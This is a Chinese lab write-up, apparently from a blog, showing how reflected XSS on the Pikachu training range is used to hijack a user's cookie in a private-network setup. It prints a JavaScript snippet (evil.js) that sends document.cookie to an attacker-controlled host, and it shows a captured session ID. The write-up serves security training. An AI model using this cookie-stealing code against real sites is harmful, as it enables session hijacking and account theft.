cookie劫持

pikachu靶场—cookie劫持

一.劫持的原理

​ 利用XSS漏洞,对存在漏洞的位置进行测试,并写出payload。

​ 将构造好的链接发送给用户,用户点击后就会将自己的cookie发送到攻击者提前布好的网站。

​ 这次使用的是pikachu靶场,里面就存在着XSS相关的漏洞。

二、劫持的过程

  • 环境说明

    • 服务器: windows 7(pikachu靶场) IP:192.168.254.136
    • 用户: windows 10 IP:192.168.254.149
    • 攻击者的网站: windows 7 IP:192.168.254.135
  • 攻击过程

    1)反射型XSS(get)

    image-20210815221824910

    2)构造测试payload

    http://192.168.254.136/pikachu/vul/xss/xss_reflected_get.php?message=&submit=submit
    

    发现浏览器弹框了,显示了1111,正好是alert的内容,说明这个位置存在xss漏洞。

    3) 提前在攻击者的网站下写好的js代码(evil.js)

    var img=document.createElement("img");
    img.src="http://192.168.254.135/log?"+escape(document.cookie);
    document.body.appendChild(img);
    

    4) 模拟用户点击构造好的payload

    http://192.168.254.136/pikachu/vul/xss/xss_reflected_get.php?message=&submit=submit
    
    image-20210815161414026

​ 5)查看获取的cookie

image-20210815222806586 image-20210815222921387

通过对比发现成功获取了用户了cookie

r68phbvh9g1pll8tnk4orouk8d


本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!

相关文章

立即
投稿

微信公众账号

微信扫一扫加关注

返回
顶部